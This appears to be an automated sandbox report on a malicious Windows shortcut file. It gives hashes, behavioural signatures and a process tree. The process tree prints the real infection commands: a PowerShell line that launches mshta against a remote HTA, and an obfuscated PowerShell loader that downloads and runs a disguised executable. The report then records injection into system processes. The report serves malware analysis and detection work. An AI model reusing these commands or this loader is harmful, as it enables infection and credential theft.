Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
09/06/2024, 09:46
Static task
static1
Behavioral task
behavioral1
Sample
9f07c02b13a50bb84630841a7a9876c9ced2ab66d406c54f4673c88e7cd70bb4.lnk
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
9f07c02b13a50bb84630841a7a9876c9ced2ab66d406c54f4673c88e7cd70bb4.lnk
Resource
win10v2004-20240426-en
General
-
Target
9f07c02b13a50bb84630841a7a9876c9ced2ab66d406c54f4673c88e7cd70bb4.lnk
-
Size
30KB
-
MD5
3deb98c1970c8ed0d95086d79e579231
-
SHA1
bc8b9ae3e0e278c69d100d30333dc380fc7fe57a
-
SHA256
9f07c02b13a50bb84630841a7a9876c9ced2ab66d406c54f4673c88e7cd70bb4
-
SHA512
e25073a88ac942f2aee7f57de6bd51b3b0dbf9caa0c5b569f603315cae5de2ce9308fa974f44b8a24b5cc661f8f152cdfc5ee985f7e388319d2ec4059cc28630
-
SSDEEP
24:8l/BHYVKVWuMs4ds+/CWLC7SfW8g/kwCYmaHKPeFI:815aTDds7S7gzTmE
Malware Config
Extracted
http://198.23.201.89/warm/wow123.hta
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 6 1020 mshta.exe 12 2652 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 1 IoCs
pid Process 1772 VAT%20certificate.exe -
pid Process 2652 powershell.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 1772 set thread context of 3416 1772 VAT%20certificate.exe 56 PID 1772 set thread context of 1876 1772 VAT%20certificate.exe 99 PID 1876 set thread context of 3416 1876 netbtugc.exe 56 PID 1876 set thread context of 3664 1876 netbtugc.exe 100 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
description ioc Process Key created \Registry\User\S-1-5-21-540404634-651139247-2967210625-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 netbtugc.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 432 powershell.exe 432 powershell.exe 2652 powershell.exe 2652 powershell.exe 1772 VAT%20certificate.exe 1772 VAT%20certificate.exe 1772 VAT%20certificate.exe 1772 VAT%20certificate.exe 1772 VAT%20certificate.exe 1772 VAT%20certificate.exe 1772 VAT%20certificate.exe 1772 VAT%20certificate.exe 1772 VAT%20certificate.exe 1772 VAT%20certificate.exe 1772 VAT%20certificate.exe 1772 VAT%20certificate.exe 1772 VAT%20certificate.exe 1772 VAT%20certificate.exe 1772 VAT%20certificate.exe 1772 VAT%20certificate.exe 1876 netbtugc.exe 1876 netbtugc.exe 1876 netbtugc.exe 1876 netbtugc.exe 1876 netbtugc.exe 1876 netbtugc.exe 1876 netbtugc.exe 1876 netbtugc.exe 1876 netbtugc.exe 1876 netbtugc.exe 1876 netbtugc.exe 1876 netbtugc.exe 1876 netbtugc.exe 1876 netbtugc.exe 1876 netbtugc.exe 1876 netbtugc.exe 1876 netbtugc.exe 1876 netbtugc.exe 1876 netbtugc.exe 1876 netbtugc.exe 1876 netbtugc.exe 1876 netbtugc.exe 1876 netbtugc.exe 1876 netbtugc.exe 1876 netbtugc.exe 1876 netbtugc.exe 1876 netbtugc.exe 1876 netbtugc.exe 1876 netbtugc.exe 1876 netbtugc.exe 1876 netbtugc.exe 1876 netbtugc.exe 1876 netbtugc.exe 1876 netbtugc.exe 1876 netbtugc.exe 1876 netbtugc.exe 1876 netbtugc.exe 1876 netbtugc.exe 1876 netbtugc.exe 1876 netbtugc.exe 1876 netbtugc.exe 1876 netbtugc.exe 1876 netbtugc.exe 1876 netbtugc.exe -
Suspicious behavior: MapViewOfSection 7 IoCs
pid Process 1772 VAT%20certificate.exe 3416 Explorer.EXE 3416 Explorer.EXE 1876 netbtugc.exe 1876 netbtugc.exe 1876 netbtugc.exe 1876 netbtugc.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 432 powershell.exe Token: SeDebugPrivilege 2652 powershell.exe -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 3416 Explorer.EXE -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 2564 wrote to memory of 432 2564 cmd.exe 84 PID 2564 wrote to memory of 432 2564 cmd.exe 84 PID 432 wrote to memory of 1020 432 powershell.exe 85 PID 432 wrote to memory of 1020 432 powershell.exe 85 PID 1020 wrote to memory of 2652 1020 mshta.exe 88 PID 1020 wrote to memory of 2652 1020 mshta.exe 88 PID 2652 wrote to memory of 1772 2652 powershell.exe 92 PID 2652 wrote to memory of 1772 2652 powershell.exe 92 PID 2652 wrote to memory of 1772 2652 powershell.exe 92 PID 3416 wrote to memory of 1876 3416 Explorer.EXE 99 PID 3416 wrote to memory of 1876 3416 Explorer.EXE 99 PID 3416 wrote to memory of 1876 3416 Explorer.EXE 99 PID 1876 wrote to memory of 3664 1876 netbtugc.exe 100 PID 1876 wrote to memory of 3664 1876 netbtugc.exe 100
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:3416 -
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\9f07c02b13a50bb84630841a7a9876c9ced2ab66d406c54f4673c88e7cd70bb4.lnk2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2564 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . $env:C:\W*\S*2\m*h?a.* 'http://198.23.201.89/warm/wow123.hta';$CaHn = Get-Location;$CaHn = Join-Path $CaHn '13820099133-PHOTO.lnk';del $CaHn3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:432 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" http://198.23.201.89/warm/wow123.hta4⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1020 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function tGIue($EpIxmuGVuZLbfA, $aTGikfPRsZRV){[IO.File]::WriteAllBytes($EpIxmuGVuZLbfA, $aTGikfPRsZRV)};function bXhQxPG($EpIxmuGVuZLbfA){if($EpIxmuGVuZLbfA.EndsWith((sJQmIfmn @(66989,67043,67051,67051))) -eq $True){rundll32.exe $EpIxmuGVuZLbfA }elseif($EpIxmuGVuZLbfA.EndsWith((sJQmIfmn @(66989,67055,67058,66992))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $EpIxmuGVuZLbfA}elseif($EpIxmuGVuZLbfA.EndsWith((sJQmIfmn @(66989,67052,67058,67048))) -eq $True){misexec /qn /i $EpIxmuGVuZLbfA}else{Start-Process $EpIxmuGVuZLbfA}};function EZaqwmkrpm($YYPOnwifQTinecw){$UnrKhxCyrLrSiUjqf = New-Object (sJQmIfmn @(67021,67044,67059,66989,67030,67044,67041,67010,67051,67048,67044,67053,67059));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$aTGikfPRsZRV = $UnrKhxCyrLrSiUjqf.DownloadData($YYPOnwifQTinecw);return $aTGikfPRsZRV};function sJQmIfmn($rdZrreW){$UDcOSFQvyucyt=66943;$hIpVaXCveA=$Null;foreach($LhcCvADFdJ in $rdZrreW){$hIpVaXCveA+=[char]($LhcCvADFdJ-$UDcOSFQvyucyt)};return $hIpVaXCveA};function VpeUnfmvvUnskxx(){$joDRUbaqCRhqCUu = $env:AppData + '\';$ZYEuq = $joDRUbaqCRhqCUu + 'VAT%20certificate.exe'; if (Test-Path -Path $ZYEuq){bXhQxPG $ZYEuq;}Else{ $rqdhhzPQQqHkKt = EZaqwmkrpm (sJQmIfmn @(67047,67059,67059,67055,67001,66990,66990,66992,67000,66999,66989,66993,66994,66989,66993,66991,66992,66989,66999,67000,66990,67062,67040,67057,67052,66990,67029,67008,67027,66980,66993,66991,67042,67044,67057,67059,67048,67045,67048,67042,67040,67059,67044,66989,67044,67063,67044));tGIue $ZYEuq $rqdhhzPQQqHkKt;bXhQxPG $ZYEuq;};;;;}VpeUnfmvvUnskxx;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2652 -
C:\Users\Admin\AppData\Roaming\VAT%20certificate.exe"C:\Users\Admin\AppData\Roaming\VAT%20certificate.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1772
-
-
-
-
-
-
C:\Windows\SysWOW64\netbtugc.exe"C:\Windows\SysWOW64\netbtugc.exe"2⤵
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1876 -
C:\Program Files\Mozilla Firefox\Firefox.exe"C:\Program Files\Mozilla Firefox\Firefox.exe"3⤵PID:3664
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
1KB
MD5548dd08570d121a65e82abb7171cae1c
SHA11a1b5084b3a78f3acd0d811cc79dbcac121217ab
SHA256cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc
SHA51237b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
264KB
MD51dcce19e1a6306424d073487af821ff0
SHA19de500775811f65415266689cbdfd035e167f148
SHA25677e14caae3daf05c1f5a6a3d10e4936cc58944d6ae9ec6943b1be6d995e94b5c
SHA5124528efd164bff904830fde7efb04d5cf3999ef4fa0b8c3d4ad0407d7cd75f03085107c8ae5651e015f62e414a59979fd264e94257c52f60540d5969fd4ca144a